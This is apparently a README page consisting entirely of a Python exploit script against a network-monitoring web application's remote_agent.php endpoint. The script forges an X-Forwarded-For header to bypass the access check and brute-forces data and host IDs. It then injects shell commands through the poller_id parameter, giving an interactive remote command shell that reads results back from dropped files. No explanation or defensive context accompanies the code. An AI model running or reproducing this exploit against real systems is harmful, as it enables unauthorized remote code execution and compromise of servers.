README.md
Rendering markdown...
import requests
import sys
from urllib.parse import urlparse
import random
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
url = sys.argv[1]
host = urlparse(url).hostname
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36",
"X-Forwarded-For": host}
def get_random_str():
return "".join(random.sample('zyxwvutsrqponmlkjihgfedcba', random.randint(5, 9)))
def check_success(file_name):
res = requests.get(url + "/" + file_name, headers=headers, verify=False)
if res.status_code == 200:
return res.text
return ""
def send_payload(poller_id, local_data_ids, host_id):
payload = "/remote_agent.php?poller_id={}&action=polldata&local_data_ids[0]={}&host_id={}".format(poller_id,
local_data_ids,
host_id)
try:
res = requests.get(url + payload, headers=headers, verify=False)
res.json()
if res.status_code == 200 and "polling_time" in res.text:
return True
except Exception as e:
pass
return False
def get_ids():
for i in range(0, 10):
for j in range(0, 10):
print("Trying... local_data_ids:{} ,host_id:{}".format(i, j))
res = send_payload("1", i, j)
if res:
return i, j
def exploit(cmd, local_data_ids, host_id):
file_name = get_random_str() + ".txt"
cmd = ";`{} > {}`".format(cmd, file_name)
send_payload(cmd, local_data_ids, host_id)
res = check_success(file_name)
print(res)
if __name__ == '__main__':
local_data_ids, host_id = get_ids()
print("GET local_data_ids:{} ,host_id:{}".format(local_data_ids, host_id))
while True:
cmd = input(">> ")
if cmd == "exit":
break
exploit(cmd, local_data_ids, host_id)